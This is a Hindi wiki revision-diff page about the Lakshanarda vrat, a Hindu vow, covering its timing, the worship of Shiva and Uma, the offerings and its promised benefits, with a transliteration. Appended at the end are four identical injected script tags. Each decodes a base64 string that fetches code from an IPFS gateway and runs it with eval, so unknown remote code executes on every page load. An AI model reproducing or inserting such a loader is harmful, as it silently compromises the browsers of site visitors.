Difference between revisions of "लक्षणार्दा व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
*लक्षणार्दाव्रत [[भाद्रपद]] [[कृष्ण पक्ष]] की [[अष्टमी]] पर आरम्भ होता है, जबकि [[आद्रा नक्षत्र]] हो।
 
*लक्षणार्दाव्रत [[भाद्रपद]] [[कृष्ण पक्ष]] की [[अष्टमी]] पर आरम्भ होता है, जबकि [[आद्रा नक्षत्र]] हो।
 
*पंचामृत से स्नान कराकर, गंध, पुष्पों आदि से तथा मंत्रों द्वारा जिनमें दोनों के नाम आये हों; शिव एवं उमा की पूजा करनी चाहिए।
 
*पंचामृत से स्नान कराकर, गंध, पुष्पों आदि से तथा मंत्रों द्वारा जिनमें दोनों के नाम आये हों; शिव एवं उमा की पूजा करनी चाहिए।
*अर्ध्य, धूप, गेहूँ के बने [[खाद्यान्न|खाद्यान्नों]] (जिन पर मत्स्य आदि की आकृतियाँ बनी रहती हैं) पाँच रसों (दही, दूध, घी, मधु एवं शक्कर) तथा मोदकों के [[नैवेद्य]]; स्वर्णिम प्रतिमाएँ एवं नैवेद्य की सामग्री किसी विद्वान ब्राह्मण को दे दी जाती हैं।
+
*अर्ध्य, धूप, गेहूँ के बने [[खाद्यान्न|खाद्यान्नों]] <ref>जिन पर मत्स्य आदि की आकृतियाँ बनी रहती हैं</ref>पाँच रसों <ref>दही, दूध, घी, मधु एवं शक्कर</ref> तथा मोदकों के [[नैवेद्य]]; स्वर्णिम प्रतिमाएँ एवं नैवेद्य की सामग्री किसी विद्वान ब्राह्मण को दे दी जाती हैं।
 
*पापमोचन, सौन्दर्य, धन, दीर्घ आयु एवं यश की प्राप्ति के लिए यह व्रत किया जाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 826-829, [[मत्स्य पुराण]] से उद्धरण)</ref>
 
*पापमोचन, सौन्दर्य, धन, दीर्घ आयु एवं यश की प्राप्ति के लिए यह व्रत किया जाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 826-829, [[मत्स्य पुराण]] से उद्धरण)</ref>
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 11:03, 11 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • lakshanardavrat bhadrapad krishna paksh ki ashtami par arambh hota hai, jabaki adra nakshatr ho.
  • panchamrit se snan karakar, gandh, pushpoan adi se tatha mantroan dvara jinamean donoan ke nam aye hoan; shiv evan uma ki pooja karani chahie.
  • ardhy, dhoop, gehooan ke bane khadyannoan [1]paanch rasoan [2] tatha modakoan ke naivedy; svarnim pratimaean evan naivedy ki samagri kisi vidvan brahman ko de di jati haian.
  • papamochan, saundary, dhan, dirgh ayu evan yash ki prapti ke lie yah vrat kiya jata hai.[3]

tika tippani aur sandarbh

  1. jin par matsy adi ki akritiyaan bani rahati haian
  2. dahi, doodh, ghi, madhu evan shakkar
  3. hemadri (vrat khand 1, 826-829, matsy puran se uddharan)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>